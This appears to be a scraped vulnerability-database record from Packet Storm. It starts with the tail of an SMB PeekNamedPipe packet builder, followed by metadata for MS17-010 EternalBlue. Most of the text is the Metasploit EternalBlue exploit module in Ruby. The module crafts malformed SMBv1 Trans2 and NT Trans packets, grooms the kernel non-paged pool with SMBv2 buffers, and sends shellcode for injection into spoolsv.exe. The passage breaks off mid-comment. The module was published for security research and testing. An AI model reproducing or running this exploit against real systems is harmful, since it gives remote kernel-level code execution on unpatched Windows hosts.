transaction packet \npkt = Rex::Proto::SMB::Constants::SMB_TRANS_PKT.make_struct \nsimple.client.smb_defaults(pkt['Payload']['SMB']) \n \n# opcode 0x23 = PeekNamedPipe, fid = 0 \nsetup = \"\\x23\\x00\\x00\\x00\" \nsetup_count = 2 # 2 words \ntrans = \"\\\\PIPE\\\\\\x00\" \n \n# calculate offsets to the SetupData payload \nbase_offset = pkt.to_s.length + (setup.length) - 4 \nparam_offset = base_offset + trans.length \ndata_offset = param_offset # + 0 \n \n# packet baselines \npkt['Payload']['SMB'].v['Command'] = Rex::Proto::SMB::Constants::SMB_COM_TRANSACTION \npkt['Payload']['SMB'].v['Flags1'] = 0x18 \npkt['Payload']['SMB'].v['Flags2'] = 0x2801 # 0xc803 would unicode \npkt['Payload']['SMB'].v['TreeID'] = tree_id \npkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count \npkt['Payload'].v['ParamCountMax'] = 0xffff \npkt['Payload'].v['DataCountMax'] = 0xffff \npkt['Payload'].v['ParamOffset'] = param_offset \npkt['Payload'].v['DataOffset'] = data_offset \n \n# actual magic: PeekNamedPipe FID=0, \\PIPE\\ \npkt['Payload'].v['SetupCount'] = setup_count \npkt['Payload'].v['SetupData'] = setup \npkt['Payload'].v['Payload'] = trans \n \npkt.to_s \nend \nend \n \n \n`\n", "_object_type": "robots.models.packetstorm.PacketstormBulletin", "_object_types": ["robots.models.packetstorm.PacketstormBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}, {"id": "PACKETSTORM:142548", "hash": "72bc350713947bf4c9b0d12ead6b098a", "type": "packetstorm", "bulletinFamily": "exploit", "title": "MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption", "description": "", "published": "2017-05-17T00:00:00", "modified": "2017-05-17T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://packetstormsecurity.com/files/142548/MS17-010-EternalBlue-SMB-Remote-Windows-Kernel-Pool-Corruption.html", "reporter": "Sean Dillon", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "lastseen": "2017-05-17T05:27:20", "history": [], "viewCount": 3221, "enchantments": {"score": {"value": 7.8, "vector": "NONE", "modified": "2017-05-17T05:27:20", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0143", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96703", "SMNTC-96706", "SMNTC-96707", "SMNTC-96705", "SMNTC-96709"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0205", "CPAI-2017-0203", "CPAI-2017-0177", "CPAI-2017-0419", "CPAI-2017-0200", "CPAI-2017-0198"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2017-05-17T05:27:20", "rev": 2}}, "objectVersion": "1.5", "sourceHref": "https://packetstormsecurity.com/files/download/142548/ms17_010_eternalblue.rb.txt", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'ruby_smb' \nrequire 'ruby_smb/smb1/packet' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption', \n'Description' => %q{ \nThis module is a port of the Equation Group ETERNALBLUE exploit, part of \nthe FuzzBunch toolkit released by Shadow Brokers. \n \nThere is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size \nis calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a \nDWORD is subtracted into a WORD. The kernel pool is groomed so that overflow \nis well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later \ncompleted in srvnet!SrvNetWskReceiveComplete. \n \nThis exploit, like the original may not trigger 100% of the time, and should be \nrun continuously until triggered. It seems like the pool will get hot streaks \nand need a cool down period before the shells rain in again. \n}, \n \n'Author' => [ \n'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0 \n'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius \n'Equation Group', \n'Shadow Brokers' \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'MSB', 'MS17-010' ], \n[ 'CVE', '2017-0143' ], \n[ 'CVE', '2017-0144' ], \n[ 'CVE', '2017-0145' ], \n[ 'CVE', '2017-0146' ], \n[ 'CVE', '2017-0147' ], \n[ 'CVE', '2017-0148' ], \n[ 'URL', 'https://github.com/RiskSense-Ops/MS17-010' ] \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 2000, # this can be more, needs to be recalculated \n'EncoderType' => Msf::Encoder::Type::Raw, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Windows 7 and Server 2008 (x64) All Service Packs', \n{ \n'Platform' => 'win', \n'Arch' => [ ARCH_X64 ], \n \n'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset \n'et_alertable' => 0x4c, # ETHREAD.Alertable offset \n'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset \n'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset \n} \n], \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 14 2017' \n)) \n \nregister_options( \n[ \nOpt::RPORT(445), \nOptString.new('ProcessName', [ true, 'Process to inject payload into.', 'spoolsv.exe' ]), \nOptInt.new( 'MaxExploitAttempts', [ true, \"The number of times to retry the exploit.\", 3 ] ), \nOptInt.new( 'GroomAllocations', [ true, \"Initial number of times to groom the kernel pool.\", 12 ] ), \nOptInt.new( 'GroomDelta', [ true, \"The amount to increase the groom count by per try.\", 5 ] ) \n]) \nend \n \ndef check \n# todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010 \nend \n \ndef exploit \nbegin \nfor i in 1..datastore['MaxExploitAttempts'] \n \ngrooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1) \n \nsmb_eternalblue(datastore['ProcessName'], grooms) \n \n# we don't need this sleep, and need to find a way to remove it \n# problem is session_count won't increment until stage is complete :\\ \nsecs = 0 \nwhile !session_created? and secs < 5 \nsecs += 1 \nsleep 1 \nend \n \nif session_created? \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nbreak \nelse \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nprint_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\") \nend \nend \n \nrescue ::RubySMB::Error::UnexpectedStatusCode, \n::Errno::ECONNRESET, \n::Rex::HostUnreachable, \n::Rex::ConnectionTimeout, \n::Rex::ConnectionRefused => e \nprint_bad(\"#{e.class}: #{e.message}\") \nrescue => error \nprint_bad(error.class.to_s) \nprint_bad(error.message) \nprint_bad(error.backtrace.join(\"\\n\")) \nensure \n# pass \nend \nend \n \n# \n# Increase the default delay by five seconds since some kernel-mode \n# payloads may not run immediately. \n# \ndef wfs_delay \nsuper + 5 \nend \n \ndef smb_eternalblue(process_name, grooms) \nbegin \n# Step 0: pre-calculate what we can \nshellcode = make_kernel_user_payload(payload.encode, 0, 0, 0, 0, 0) \npayload_hdr_pkt = make_smb2_payload_headers_packet \npayload_body_pkt = make_smb2_payload_body_packet(shellcode) \n \n# Step 1: Connect to IPC$ share \nprint_status(\"Connecting to target for exploitation.\") \nclient, tree, sock = smb1_anonymous_connect_ipc() \nprint_good(\"Connection established for exploitation.\") \n \nprint_status(\"Trying exploit with #{grooms} Groom Allocations.\") \n \n# Step 2: Create a large SMB1 buffer \nprint_status(\"Sending all but last fragment of exploit packet\") \nsmb1_large_buffer(client, tree, sock) \n \n# Step 3: Groom the pool with payload packets, and open/close SMB1 packets \nprint_status(\"Starting non-paged pool grooming\") \n \n# initialize_groom_threads(ip, port, payload, grooms) \nfhs_sock = smb1_free_hole(true) \n \n@groom_socks = [] \n \nprint_good(\"Sending SMBv2 buffers\") \nsmb2_grooms(grooms, payload_hdr_pkt) \n \nfhf_sock = smb1_free_hole(false) \n \nprint_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\") \nfhs_sock.shutdown() \n \nprint_status(\"Sending final SMBv2 buffers.\") # 6x \nsmb2_grooms(6, payload_hdr_pkt) # todo: magic # \n \nfhf_sock.shutdown() \n \nprint_status(\"Sending last fragment of exploit packet!\") \nfinal_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15) \nsock.put(final_exploit_pkt) \n \nprint_status(\"Receiving response from exploit packet\") \ncode, raw = smb1_get_response(sock) \n \nif code == 0xc000000d #STATUS_INVALID_PARAMETER (0xC000000D) \nprint_good(\"ETERNALBLUE overwrite completed successfully (0xC000000D)!\") \nend \n \n# Step 4: Send the payload \nprint_status(\"Sending egg to corrupted connection.\") \n \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) } \n@groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) } \n \nprint_status(\"Triggering free of corrupted buffer.\") \n# tree disconnect \n# logoff and x \n# note: these aren't necessary, just close the sockets \n \nensure \nabort_sockets \nend \nend \n \ndef smb2_grooms(grooms, payload_hdr_pkt) \ngrooms.times do |groom_id| \ngsock = connect(false) \n@groom_socks << gsock \ngsock.put(payload_hdr_pkt) \nend \nend \n \ndef smb1_anonymous_connect_ipc() \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = make_smb1_anonymous_login_packet \nsock.put(pkt) \n \ncode, raw, response = smb1_get_response(sock) \n \nunless code == 0 # WindowsError::NTStatus::STATUS_SUCCESS \nraise RubySMB::Error::UnexpectedStatusCode, \"Error with anonymous login\" \nend \n \nclient.user_id = response.uid \n \ntree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\") \n \nreturn client, tree, sock \nend \n \ndef smb1_large_buffer(client, tree, sock) \nnt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id) \n \n# send NT Trans \nvprint_status(\"Sending NT Trans Request packet\") \nsock.put(nt_trans_pkt) \n \nvprint_status(\"Receiving NT Trans packet\") \nraw = sock.get_once \n \n# Initial Trans2 request \ntrans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0) \n \n# send all but last packet \nfor i in 1..14 \ntrans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i) \nend \n \ntrans2_pkt_nulled << make_smb1_echo_packet(tree.id, client.user_id) \n \nvprint_status(\"Sending malformed Trans2 packets\") \nsock.put(trans2_pkt_nulled) \n \nsock.get_once \nend \n \ndef smb1_free_hole(start) \nsock = connect(false) \ndispatcher = RubySMB::Dispatcher::Socket.new(sock) \nclient = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: '', password: '') \nclient.negotiate \n \npkt = \"\" \n \nif start \nvprint_status(\"Sending start free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\") \nelse \nvprint_status(\"Sending end free hole packet.\") \npkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\") \nend \n \n#dump_packet(pkt) \nsock.put(pkt) \n \nvprint_status(\"Receiving free hole response.\") \nsock.get_once \n \nreturn sock \nend \n \ndef smb1_get_response(sock) \nraw = sock.get_once \nresponse = RubySMB::SMB1::SMBHeader.read(raw[4..-1]) \ncode = response.nt_status \nreturn code, raw, response \nend \n \ndef make_smb2_payload_headers_packet \n# don't need a library here, the packet is essentially nonsensical \npkt = \"\" \npkt << \"\\x00\" # session message \npkt << \"\\x00\\xff\\xf7\" # size \npkt << \"\\xfeSMB\" # SMB2 \npkt << \"\\x00\" * 124 \n \npkt \nend \n \ndef make_smb2_payload_body_packet(kernel_user_payload) \n# precalculated lengths \npkt_max_len = 4204 \npkt_setup_len = 497 \npkt_max_payload = pkt_max_len - pkt_setup_len # 3575 \n \n# this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode \npkt = \"\" \n \n# padding \npkt << \"\\x00\" * 0x8 \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x1c \npkt << \"\\x03\\x00\\x00\\x00\" \npkt << \"\\x00\" * 0x74 \n \n# KI_USER_SHARED_DATA addresses \npkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address \npkt << \"\\x00\" * 0x10 \npkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address \npkt << \"\\x00\" * 0xc4 \n \n# payload addreses \npkt << \"\\x90\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x4 \npkt << \"\\xf0\\xf1\\xdf\\xff\" \npkt << \"\\x00\" * 0x40 \n \npkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" \n \npkt << kernel_user_payload \n \n# fill out the rest, this can be randomly generated \npkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length) \n \npkt \nend \n \ndef make_smb1_echo_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # type \npkt << \"\\x00\\x00\\x31\" # len = 49 \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x2b\" # Echo \npkt << \"\\x00\\x00\\x00\\x00\" # Success \npkt << \"\\x18\" # flags \npkt << \"\\x07\\xc0\" # flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # Tree ID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x01\" # Word count \npkt << \"\\x01\\x00\" # Echo count \npkt << \"\\x0c\\x00\" # Byte count \n \n# echo data \n# this is an existing IDS signature, and can be nulled out \n#pkt << \"\\x4a\\x6c\\x4a\\x6d\\x49\\x68\\x43\\x6c\\x42\\x73\\x72\\x00\" \npkt << \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\" \n \npkt \nend \n \n# Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit \ndef make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout) \ntimeout = (timeout * 0x10) + 3 \n \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x10\\x35\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x33\" # Trans2 request \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexIDs \n \npkt << \"\\x09\" # Word Count \npkt << \"\\x00\\x00\" # Total Param Count \npkt << \"\\x00\\x10\" # Total Data Count \npkt << \"\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\" # Max Data Count \npkt << \"\\x00\" # Max Setup Count \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Flags \npkt << \"\\x35\\x00\\xd0\" # Timeouts \npkt << timeout.chr \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x10\" # Parameter Count \n \n#pkt << \"\\x74\\x70\" # Parameter Offset \n#pkt << \"\\x47\\x46\" # Data Count \n#pkt << \"\\x45\\x6f\" # Data Offset \n#pkt << \"\\x4c\" # Setup Count \n#pkt << \"\\x4f\" # Reserved \n \nif type == :eb_trans2_exploit \nvprint_status(\"Making :eb_trans2_exploit packet\") \n \npkt << \"\\x41\" * 2957 \n \npkt << \"\\x80\\x00\\xa8\\x00\" # overflow \n \npkt << \"\\x00\" * 0x10 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x6 \npkt << \"\\xff\\xff\" \npkt << \"\\x00\" * 0x16 \n \npkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses \npkt << \"\\x00\" * 0x8 \npkt << \"\\x20\\xf0\\xdf\\xff\" \n \npkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 4 \n \npkt << \"\\x80\\xef\\xdf\\xff\" \n \npkt << \"\\x00\" * 4 \npkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x10 \n \npkt << \"\\x60\\x00\\x04\\x10\" \npkt << \"\\x00\" * 0xc \npkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\" \npkt << \"\\x00\" * 0x8 \npkt << \"\\x80\\x10\" \npkt << \"\\x00\" * 0xe \npkt << \"\\x39\" \npkt << \"\\xbb\" \n \npkt << \"\\x41\" * 965 \n \nreturn pkt \nend \n \nif type == :eb_trans2_zero \nvprint_status(\"Making :eb_trans2_zero packet\") \npkt << \"\\x00\" * 2055 \npkt << \"\\x83\\xf3\" \npkt << \"\\x41\" * 2039 \n#pkt << \"\\x00\" * 4096 \nelse \nvprint_status(\"Making :eb_trans2_buffer packet\") \npkt << \"\\x41\" * 4096 \nend \n \npkt \n \nend \n \ndef make_smb1_nt_trans_packet(tree_id, user_id) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x04\\x38\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\xa0\" # NT Trans \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << [tree_id].pack(\"S>\") # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << [user_id].pack(\"S>\") # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x14\" # Word Count \npkt << \"\\x01\" # Max Setup Count \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x1e\\x00\\x00\\x00\" # Total Param Count \npkt << \"\\xd0\\x03\\x01\\x00\" # Total Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Max Param Count \npkt << \"\\x00\\x00\\x00\\x00\" # Max Data Count \npkt << \"\\x1e\\x00\\x00\\x00\" # Param Count \npkt << \"\\x4b\\x00\\x00\\x00\" # Param Offset \npkt << \"\\xd0\\x03\\x00\\x00\" # Data Count \npkt << \"\\x68\\x00\\x00\\x00\" # Data Offset \npkt << \"\\x01\" # Setup Count \npkt << \"\\x00\\x00\" # Function <unknown> \npkt << \"\\x00\\x00\" # Unknown NT transaction (0) setup \npkt << \"\\xec\\x03\" # Byte Count \npkt << \"\\x00\" * 0x1f # NT Parameters \n \n# undocumented \npkt << \"\\x01\" \npkt << \"\\x00\" * 0x3cd \n \npkt \nend \n \ndef make_smb1_free_hole_session_packet(flags2, vcnum, native_os) \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x51\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << flags2 # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n#pkt << \"\\x00\\x00\" # Reserved \n \npkt << \"\\x0c\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x00\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << vcnum # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x00\\x00\" # Security blob length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\\x00\\x80\" # Capabilities \npkt << \"\\x16\\x00\" # Byte count \n#pkt << \"\\xf0\" # Security Blob: <MISSING> \n#pkt << \"\\xff\\x00\\x00\\x00\" # Native OS \n#pkt << \"\\x00\\x00\" # Native LAN manager \n#pkt << \"\\x00\\x00\" # Primary domain \npkt << native_os \npkt << \"\\x00\" * 17 # Extra byte params \n \npkt \nend \n \ndef make_smb1_anonymous_login_packet \n# Neither Rex nor RubySMB appear to support Anon login? \npkt = \"\" \npkt << \"\\x00\" # Session message \npkt << \"\\x00\\x00\\x88\" # length \npkt << \"\\xffSMB\" # SMB1 \npkt << \"\\x73\" # Session Setup AndX \npkt << \"\\x00\\x00\\x00\\x00\" # NT SUCCESS \npkt << \"\\x18\" # Flags \npkt << \"\\x07\\xc0\" # Flags2 \npkt << \"\\x00\\x00\" # PID High \npkt << \"\\x00\\x00\\x00\\x00\" # Signature1 \npkt << \"\\x00\\x00\\x00\\x00\" # Signature2 \npkt << \"\\x00\\x00\" # TreeID \npkt << \"\\xff\\xfe\" # PID \npkt << \"\\x00\\x00\" # Reserved \npkt << \"\\x00\\x00\" # UserID \npkt << \"\\x40\\x00\" # MultiplexID \n \npkt << \"\\x0d\" # Word Count \npkt << \"\\xff\" # No further commands \npkt << \"\\x00\" # Reserved \npkt << \"\\x88\\x00\" # AndXOffset \npkt << \"\\x04\\x11\" # Max Buffer \npkt << \"\\x0a\\x00\" # Max Mpx Count \npkt << \"\\x00\\x00\" # VC Number \npkt << \"\\x00\\x00\\x00\\x00\" # Session key \npkt << \"\\x01\\x00\" # ANSI pw length \npkt << \"\\x00\\x00\" # Unicode pw length \npkt << \"\\x00\\x00\\x00\\x00\" # Reserved \npkt << \"\\xd4\\x00\\x00\\x00\" # Capabilities \npkt << \"\\x4b\\x00\" # Byte count \npkt << \"\\x00\" # ANSI pw \npkt << \"\\x00\\x00\" # Account name \npkt << \"\\x00\\x00\" # Domain name \n \n# Windows 2000 2195 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x32\\x00\\x31\\x00\\x39\\x00\\x35\\x00\" \npkt << \"\\x00\\x00\" \n \n# Windows 2000 5.0 \npkt << \"\\x57\\x00\\x69\\x00\\x6e\\x00\\x64\\x00\\x6f\\x00\\x77\\x00\\x73\\x00\\x20\\x00\\x32\" \npkt << \"\\x00\\x30\\x00\\x30\\x00\\x30\\x00\\x20\\x00\\x35\\x00\\x2e\\x00\\x30\\x00\\x00\\x00\" \n \npkt \nend \n \n# ring3 = user mode encoded payload \n# proc_name = process to inject APC into \n# ep_thl_b = EPROCESS.ThreadListHead.Blink offset \n# et_alertable = ETHREAD.Alertable 